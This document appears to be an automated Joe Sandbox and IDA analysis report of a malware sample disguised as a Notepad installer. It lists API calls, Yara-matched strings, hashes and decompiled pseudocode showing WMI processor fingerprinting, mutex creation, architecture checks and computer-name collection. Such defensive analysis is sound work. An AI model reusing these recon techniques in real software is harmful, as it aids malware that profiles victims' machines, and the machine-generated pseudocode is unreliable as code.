                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: dDo$if-modified-sinc$transfer-encodin
                                      • API String ID: 1475443563-3052112879
                                      • Opcode ID: 6957ee632819d41d4d74af04c8fa32748a0e9316887744d5458a1bfc7cc9acc9
                                      • Instruction ID: 5c005220ad59f5eccaa4da17e6497e2019584ea79c18f3ae8db3924268e6b4aa
                                      • Opcode Fuzzy Hash: 6957ee632819d41d4d74af04c8fa32748a0e9316887744d5458a1bfc7cc9acc9
                                      • Instruction Fuzzy Hash: D9E0DF2074A3C821D624563A2C02BB72E4BA7517AAF0008A5BE64DC287E842CD534000
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: access-control-expose-header$access-control-request-metho$Eo
                                      • API String ID: 1475443563-1161587764
                                      • Opcode ID: e86b36d78f35fad0eededf67ddfdc77f3dcdfbf68870032a7a81908122823a21
                                      • Instruction ID: 6a07e8a58015db8a8795132507d6630a97ce8e442b527dcd1cf77c8703b1b2c7
                                      • Opcode Fuzzy Hash: e86b36d78f35fad0eededf67ddfdc77f3dcdfbf68870032a7a81908122823a21
                                      • Instruction Fuzzy Hash: CBE0DF187CA3C821EA64652A1C02BF35E4B5B21326F1104A5FE449D387E742CD034001
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: <Fo$access-control-allow-header$access-control-allow-method
                                      • API String ID: 1475443563-4037146479
                                      • Opcode ID: 478d3d0c96caf2f714590ee3f922f1f9f36d01c38d4a18825ec92ffb83861cc5
                                      • Instruction ID: 1ceb2554e4fd5ad6d6dc589681f68d8a6de38f3d5012cc62f8c1bf2629a8553c
                                      • Opcode Fuzzy Hash: 478d3d0c96caf2f714590ee3f922f1f9f36d01c38d4a18825ec92ffb83861cc5
                                      • Instruction Fuzzy Hash: 28E08C15F8E3D872EB6065261C027BB6E4B6F12369F0104E6FE08AA783E3408F179186
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • VariantClear.OLEAUT32(00000001), ref: 006EAA6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: NumberOfCores$ROOT\CIMV2$SELECT * FROM Win32_Processor
                                      • API String ID: 261499160-2075090250
                                      • Opcode ID: 39e3338326d4889046deabd84e15b76480b5acf42665b5607bd2f914749f7f95
                                      • Instruction ID: 5dbeee31467671ac6680e15745a336716c8a0e7e2517984fa6d41a2d513f0600
                                      • Opcode Fuzzy Hash: 39e3338326d4889046deabd84e15b76480b5acf42665b5607bd2f914749f7f95
                                      • Instruction Fuzzy Hash: 2B317C72A01219ABCB10CBD9C9489EEB7BEEF48700B1040A9F502E7294D771AE45CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 47%
                                      			E00409396(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi) {
                                      				void* _t100;
                                      
                                      				while(1) {
                                      					L19:
                                      					__edx = __edx + 1;
                                      					__esi = __ecx;
                                      					 *((char*)(__edx - 1)) = __al;
                                      					__eflags = __al;
                                      					if(__al == 0) {
                                      						goto L22;
                                      					} else {
                                      						goto L20;
                                      					}
                                      					while(1) {
                                      						L20:
                                      						__eax =  *__esi & 0x000000ff;
                                      						__ecx = __esi + 1;
                                      						__eflags = __al - 0x7f;
                                      						if(__al != 0x7f) {
                                      							goto L19;
                                      						}
                                      						__eax =  *(__esi + 1) & 0x000000ff;
                                      						__edx = __edx + 1;
                                      						__esi = __esi + 2;
                                      						 *((char*)(__edx - 1)) = __al;
                                      						__eflags = __al;
                                      						if(__al != 0) {
                                      							continue;
                                      						}
                                      						goto L22;
                                      					}
                                      					continue;
                                      					L22:
                                      					__eax =  *(__ebp - 0x5c);
                                      					 *__esp = __eax;
                                      					L00408484();
                                      					__esp = __edi;
                                      					__esi = __eax;
                                      					__eflags = __eax;
                                      					if(__eax == 0) {
                                      						 *(__ebp - 0x2c) = 3;
                                      						L25:
                                      						__esp =  *(__ebp - 0x54);
                                      						while(1) {
                                      							L13:
                                      							__eax =  *(__ebp - 0x34);
                                      							__eax = E00409F60( *(__ebp - 0x34));
                                      							__esi = __eax;
                                      							__eflags = __eax;
                                      							if(__eax != 0) {
                                      								break;
                                      							}
                                      							 *(__ebp - 0x34) = E00409FB0( *(__ebp - 0x34));
                                      							__eax =  *(__ebp - 0x50);
                                      							__eflags =  *(__ebp - 0x50);
                                      							if( *(__ebp - 0x50) != 0) {
                                      								__edx =  *(__ebp + 8);
                                      								 *(__ebp - 0x50) = E00408CF0( *(__ebp - 0x50),  *(__ebp + 8));
                                      							}
                                      							while(1) {
                                      								__eax =  *__ebx;
                                      								__ebx = __ebx + 4;
                                      								__eax = E00408660(__eax);
                                      								__eax =  *__ebx;
                                      								__eflags = __eax;
                                      								if(__eax == 0) {
                                      									break;
                                      								}
                                      								__eflags =  *(__ebp - 0x2c) - 1;
                                      								if( *(__ebp - 0x2c) == 1) {
                                      									L6:
                                      									 *(__ebp - 0x2c) = 1;
                                      									continue;
                                      								}
                                      								 *__esp = __eax;
                                      								__eax = E00409D60();
                                      								 *(__ebp - 0x34) = __eax;
                                      								__eflags = __eax;
                                      								if(__eax == 0) {
                                      									__eflags =  *(__ebp - 0x30) & 0x00000004;
                                      									if(( *(__ebp - 0x30) & 0x00000004) != 0) {
                                      										goto L6;
                                      									}
                                      									__edi =  *(__ebp - 0x38);
                                      									__eflags = __edi;
                                      									if(__edi == 0) {
                                      										continue;
                                      									}
                                      									L0040A388();
                                      									 *(__esp + 4) = __eax;
                                      									__eax =  *__ebx;
                                      									 *__esp =  *__ebx;
                                      									__eax =  *__edi();
                                      									__eflags = __eax;
                                      									if(__eax == 0) {
                                      										continue;
                                      									} else {
                                      										goto L6;
                                      									}
                                      								}
                                      								__eax =  *(__ebp - 0x40);
                                      								 *(__ebp - 0x4c) = 0;
                                      								__eflags =  *(__ebp - 0x40);
                                      								if( *(__ebp - 0x40) != 0) {
                                      									__eax =  *__ebx;
                                      									 *(__ebp - 0x4c) = strlen( *__ebx);
                                      								}
                                      								__eax =  *(__ebp - 0x4c);
                                      								 *(__ebp - 0x50) = 0;
                                      								__eax =  *(__ebp - 0x4c) + 2;
                                      								__eflags = __eax;
                                      								 *(__ebp - 0x60) = __eax;
                                      								goto L13;
                                      							}
                                      							__eax =  *(__ebp - 0x20);
                                      							__edi =  *(__ebp - 0x20);
                                      							__eax = E00408660(__edi);
                                      							__esp =  *(__ebp - 0x44);
                                      							return  *((intOrPtr*)(_t100 - 0x2c));
                                      						}
                                      						__edi =  *(__ebp - 0x3c);
                                      						__eflags =  *(__ebp - 0x3c);
                                      						if( *(__ebp - 0x3c) == 0) {
                                      							L16:
                                      							_t20 = __esi + 0xc; // 0xc
                                      							__edi = _t20;
                                      							__ecx =  *(__ebp - 0x30);
                                      							__eax =  *(__ebp - 0x48);
                                      							__edx = __edi;
                                      							__eax = E004089C0( *(__ebp - 0x48),  *(__ebp - 0x30), __edi);
                                      							__eflags = __eax;
                                      							if(__eax != 0) {
                                      								goto L13;
                                      							}
                                      							__ecx =  *(__esi + 6) & 0x0000ffff;
                                      							__eax =  *(__ebp - 0x60);
                                      							 *(__ebp - 0x54) = __esp;
                                      							__eax = __ecx +  *(__ebp - 0x60) + 0xf;
                                      							__eax = __ecx +  *(__ebp - 0x60) + 0xf >> 4;
                                      							__eax = __ecx +  *(__ebp - 0x60) + 0xf >> 4 << 4;
                                      							__eax = E00408390(__ecx +  *(__ebp - 0x60) + 0xf >> 4 << 4);
                                      							__esi =  *(__ebp - 0x4c);
                                      							__esp = __esp - __eax;
                                      							__edx = __esp + 0xc;
                                      							 *(__ebp - 0x58) = __edx;
                                      							__eax = __edx;
                                      							__eflags =  *(__ebp - 0x4c);
                                      							if( *(__ebp - 0x4c) != 0) {
                                      								__esi =  *(__ebp - 0x4c);
                                      								__eax =  *__ebx;
                                      								 *(__ebp - 0x68) = __ecx;
                                      								 *__esp = __edx;
                                      								 *(__esp + 8) = __esi;
                                      								 *(__esp + 4) =  *__ebx;
                                      								 *(__ebp - 0x5c) = __edx;
                                      								memcpy(??, ??, ??) =  *(__esp + __esi + 0xb) & 0x000000ff;
                                      								__edx =  *(__ebp - 0x5c);
                                      								__ecx =  *(__ebp - 0x68);
                                      								__eflags = __al - 0x2f;
                                      								if(__al == 0x2f) {
                                      									L46:
                                      									__eax =  *(__ebp - 0x4c);
                                      									__eax =  *(__ebp - 0x4c) + __edx;
                                      									goto L18;
                                      								}
                                      								__eflags = __al - 0x5c;
                                      								if(__al == 0x5c) {
                                      									goto L46;
                                      								}
                                      								__esi =  *(__ebp - 0x4c);
                                      								__eax =  *(__ebp - 0x61) & 0x000000ff;
                                      								 *((char*)(__edx + __esi)) = __al;
                                      								__eax = __edx + __esi + 1;
                                      							}
                                      							L18:
                                      							__ecx = 1 + __ecx;
                                      							 *(__ebp - 0x5c) = __edx;
                                      							 *(__esp + 8) = __ecx;
                                      							 *(__esp + 4) = __edi;
                                      							__edi = __esp;
                                      							 *__esp = __eax;
                                      							__eax = memcpy(??, ??, ??);
                                      							__edx =  *(__ebp - 0x5c);
                                      							__eax = strlen( *(__ebp - 0x5c));
                                      							__eax = __eax + 0x10;
                                      							__eax = __eax >> 4;
                                      							__eax = __eax << 4;
                                      							__eax = E00408390(__eax);
                                      							__esi =  *(__ebp - 0x58);
                                      							__esp = __esp - __eax;
                                      							__eax = __esp + 0xc;
                                      							 *(__ebp - 0x5c) = __eax;
                                      							__edx = __eax;
                                      							goto L20;
                                      						}
                                      						__eflags =  *((intOrPtr*)(__esi + 8)) - 0x10;
                                      						if( *((intOrPtr*)(__esi + 8)) != 0x10) {
                                      							goto L13;
                                      						}
                                      						goto L16;
                                      					}
                                      					__edi =  *(__ebp - 0x2c);
                                      					__eax = 0;
                                      					__eflags = __edi - 2;
                                      					0 | __eflags == 0x00000000 = (0 | __eflags == 0x00000000) - 1;
                                      					 *(__ebp - 0x2c) = __edi;
                                      					__eflags =  *(__ebp - 0x30) & 0x00000040;
                                      					if(( *(__ebp - 0x30) & 0x00000040) == 0) {
                                      						__edi =  *(__ebp - 0x50);
                                      						__eflags = __edi;
                                      						if(__edi == 0) {
                                      							__eax = malloc(0xc);
                                      							 *(__ebp - 0x50) = __eax;
                                      							__eflags = __eax;
                                      							if(__eax != 0) {
                                      								__eax =  *(__ebp - 0x50);
                                      								 *(__eax + 8) = __esi;
                                      								 *(__eax + 4) = 0;
                                      								 *__eax = 0;
                                      							}
                                      							goto L25;
                                      						}
                                      						__eax =  *(__ebp - 0x30);
                                      						 *(__ebp - 0x58) = __ebx;
                                      						__eax =  *(__ebp - 0x30) & 0x00004000;
                                      						__ebx =  *(__ebp - 0x30) & 0x00004000;
                                      						while(1) {
                                      							__eax =  *(__edi + 8);
                                      							 *__esp = __esi;
                                      							 *(__esp + 4) = __eax;
                                      							__eflags = __ebx;
                                      							if(__ebx != 0) {
                                      								__eax = strcoll();
                                      							} else {
                                      								L0040A418();
                                      							}
                                      							__ecx =  *__edi;
                                      							__edx =  *(__edi + 4);
                                      							__eflags = __eax;
                                      							if(__eax <= 0) {
                                      								__edx = __ecx;
                                      							}
                                      							__eflags = __edx;
                                      							if(__edx == 0) {
                                      								break;
                                      							}
                                      							__edi = __edx;
                                      						}
                                      						__ebx =  *(__ebp - 0x58);
                                      						 *(__ebp - 0x58) = __eax;
                                      						__eax = malloc(0xc);
                                      						__edx =  *(__ebp - 0x58);
                                      						__eflags = __eax;
                                      						if(__eax != 0) {
                                      							 *(__eax + 8) = __esi;
                                      							 *(__eax + 4) = 0;
                                      							 *__eax = 0;
                                      							__eflags = __edx;
                                      							if(__edx <= 0) {
                                      								 *__edi = __eax;
                                      							} else {
                                      								 *(__edi + 4) = __eax;
                                      							}
                                      						}
                                      						goto L25;
                                      					}
                                      					__edx =  *(__ebp + 8);
                                      					__eflags =  *(__ebp + 8);
                                      					if( *(__ebp + 8) != 0) {
                                      						__edx =  *(__ebp + 8);
                                      						__esi = E00408C90(__esi,  *(__ebp + 8));
                                      					}
                                      					goto L25;
                                      				}
                                      			}





                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _strdupmemcpystrlen
                                      • String ID: @
                                      • API String ID: 126217880-2766056989
                                      • Opcode ID: 9c24902c5e30cb55f321b96a675ceb21fec390015c1737647a046163cf627364
                                      • Instruction ID: fe3117e29edfcc56e118669b082565f135b9c9798d243c11a71a70d7bb9af643
                                      • Opcode Fuzzy Hash: 9c24902c5e30cb55f321b96a675ceb21fec390015c1737647a046163cf627364
                                      • Instruction Fuzzy Hash: 49313A71D046558BCB14DFA9C0401AEFBF1AF84304F19896EDC95BB386EA39ED02CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • VariantClear.OLEAUT32(?), ref: 006EB107
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: ProcessorId$ROOT\CIMV2$SELECT * FROM Win32_Processor
                                      • API String ID: 261499160-627074212
                                      • Opcode ID: cfdcae43040ace65dd4aacd65597030defe7e9a7c559d0a416f7da4fd35a57b8
                                      • Instruction ID: d55312d4f1181cad164e5eca299a772d2d0f37bca393f1d405c6f92ce74e5020
                                      • Opcode Fuzzy Hash: cfdcae43040ace65dd4aacd65597030defe7e9a7c559d0a416f7da4fd35a57b8
                                      • Instruction Fuzzy Hash: B7312B72A01219AFCB00CB95C9449EFB7BAEF48710F144099F516E7250DB70AE45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,00000000), ref: 006E5FAF
                                      • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 006E5FBD
                                        • Part of subcall function 006E0517: memset.NTDLL ref: 006E0539
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcmemset
                                      • String ID: KiUserExceptionDispatcher$ntdll.dll
                                      • API String ID: 3137504439-391726712
                                      • Opcode ID: bd7bc4af9d2db04d4839a064405b9205cc204da10baa395e02f1a99e667bd280
                                      • Instruction ID: d63141d69da0a8fd4d9865959ea2ca62e6ed13742e878e42eea463efd1979f47
                                      • Opcode Fuzzy Hash: bd7bc4af9d2db04d4839a064405b9205cc204da10baa395e02f1a99e667bd280
                                      • Instruction Fuzzy Hash: 4711B67280135ABBCB20ABA6CD84CEFBB7EEF64395B110459F90593242E630DA41CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _assert.MSVCRT ref: 004071C5
                                        • Part of subcall function 00406AE0: memcpy.MSVCRT ref: 00406B47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _assertmemcpy
                                      • String ID: af[n_layers-2] == SANN_AF_SIGM$b$sfnn.c
                                      • API String ID: 1759651462-853114603
                                      • Opcode ID: a43b065e81bc5f520b38744c3821e2e60fc06f53effe96fa989c186c6bd61178
                                      • Instruction ID: efaa6bd42c175177b3739ec105c2edcfc0b731ca70b0f38abc6686090ecf7277
                                      • Opcode Fuzzy Hash: a43b065e81bc5f520b38744c3821e2e60fc06f53effe96fa989c186c6bd61178
                                      • Instruction Fuzzy Hash: 3A2165B4A09341CFC3009F1AD58451AFBE4BBC8754F12895EF8D863360C3B4A965CE9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateMutexW.KERNEL32(00000000,00000000,Random name), ref: 006E9F4E
                                      • SetHandleInformation.KERNEL32(00000000,00000002,00000002), ref: 006E9F5F
                                      • CloseHandle.KERNEL32(00000000), ref: 006E9F69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Handle$CloseCreateInformationMutex
                                      • String ID: Random name
                                      • API String ID: 551106905-3259162790
                                      • Opcode ID: 1dc134e75a88fa329418a2200ddc38815a434626d2fdff26a6f44733cfc8b8e6
                                      • Instruction ID: 4ee3682afb69f00138d5aa2db194ffdc152c550a4b551933c25f914ce2880d76
                                      • Opcode Fuzzy Hash: 1dc134e75a88fa329418a2200ddc38815a434626d2fdff26a6f44733cfc8b8e6
                                      • Instruction Fuzzy Hash: FCF09675541754BBC3219B699D4AF6FBFB9EB81B20F100615F521E22C0C7740900CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006E86E5,00000000), ref: 006E8D77
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E8D83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 1646373207-3024904723
                                      • Opcode ID: 2b9e0674c2338e2c1df568fd73445a91b172f3170c9acd8b9de1ef0b75083ca8
                                      • Instruction ID: 13d8ad24b9cfa16ccf232b76cdd8761cb8658cca6c2e26f7a4c8ecf1dcbcf00f
                                      • Opcode Fuzzy Hash: 2b9e0674c2338e2c1df568fd73445a91b172f3170c9acd8b9de1ef0b75083ca8
                                      • Instruction Fuzzy Hash: 9AE0C970A1130AAFDB40CBAADD15BA977BAAB24349B104058B949D2290EBB0DA00DB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc$memcpy
                                      • String ID:
                                      • API String ID: 408996518-0
                                      • Opcode ID: 496fd151cc3c48e16d10be8a90bcdee9b0de26c3da543963b7166f9fe9d891bb
                                      • Instruction ID: 2b5e9b44f171ab256f009dd6ccb57ba63096bb93fcdddc9b69114f20b7a21c86
                                      • Opcode Fuzzy Hash: 496fd151cc3c48e16d10be8a90bcdee9b0de26c3da543963b7166f9fe9d891bb
                                      • Instruction Fuzzy Hash: 612147B08097049FDB10EF28C08075EBBE4EF84308F45886EE8889B382E779D844CF46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errnomallocmemcpy
                                      • String ID:
                                      • API String ID: 2682620949-0
                                      • Opcode ID: e05f1a1e50549831afe1b03830c3a49291f5a8f1870574ff32da2a27a43884e0
                                      • Instruction ID: 7ae95b20c6939c2202671c4353697d9b608ecc7b5fcbeb4f374919dd075e137d
                                      • Opcode Fuzzy Hash: e05f1a1e50549831afe1b03830c3a49291f5a8f1870574ff32da2a27a43884e0
                                      • Instruction Fuzzy Hash: 30816E716083128FC714CF28C58022ABBE1BF88744F09896EE885AB385D774ED45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: malloc$_strdup$_readmemcpy
                                      • String ID:
                                      • API String ID: 508882997-0
                                      • Opcode ID: 312db82317f906323d64b4ebfd86c86768698df87ecac38df35ec8c57f58675a
                                      • Instruction ID: f5c6f150da34862c6af7f3345568895f557703f22d5750b41a81333fc9639a64
                                      • Opcode Fuzzy Hash: 312db82317f906323d64b4ebfd86c86768698df87ecac38df35ec8c57f58675a
                                      • Instruction Fuzzy Hash: 6961AF756083128FC715CF28C58032EBBE1BF85704F0949AEE885AB385D778ED45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memcpy.NTDLL(?,?,00000040,?,00000000,?,?,006E387B,?,00000018,00000020,?,?,?), ref: 006EE49F
                                      • memcpy.NTDLL(?,?,00000020,?,00000000,?,?,006E387B,?,00000018,00000020,?,?,?), ref: 006EE4EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @$@
                                      • API String ID: 3510742995-149943524
                                      • Opcode ID: 0f864ece7f8b611ed8be4af693050dc0e2b40d811238cbeabf009b77263fa2ed
                                      • Instruction ID: 9d38d38ccadd160106be7d17a2205a00db14329c9475d5b01d950d172036251a
                                      • Opcode Fuzzy Hash: 0f864ece7f8b611ed8be4af693050dc0e2b40d811238cbeabf009b77263fa2ed
                                      • Instruction Fuzzy Hash: E3112773202349ABDF149EAA9C80CEF73AAFF40324B10852DFD1AC7181D776D9128B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: callocmallocmemset
                                      • String ID: R1n
                                      • API String ID: 3201439907-4230899745
                                      • Opcode ID: 15c6ee03c25a517bc67df0d6e2c706fcca568fd72660dd2807fed000d79afd97
                                      • Instruction ID: eb9206cda092e9cee884c7671c765d5ba10877db99905cc6cbca0fa971669f82
                                      • Opcode Fuzzy Hash: 15c6ee03c25a517bc67df0d6e2c706fcca568fd72660dd2807fed000d79afd97
                                      • Instruction Fuzzy Hash: 3B116A726513059FDB04CF19DC85AAAB7EAEF98760B24842EF899C7340DB75F8418B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,?,006EA6CE), ref: 006EA783
                                      • malloc.MSVCRT ref: 006EA78D
                                      • GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,006EA6CE), ref: 006EA7A1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7A8
                                      Memory Dump Source
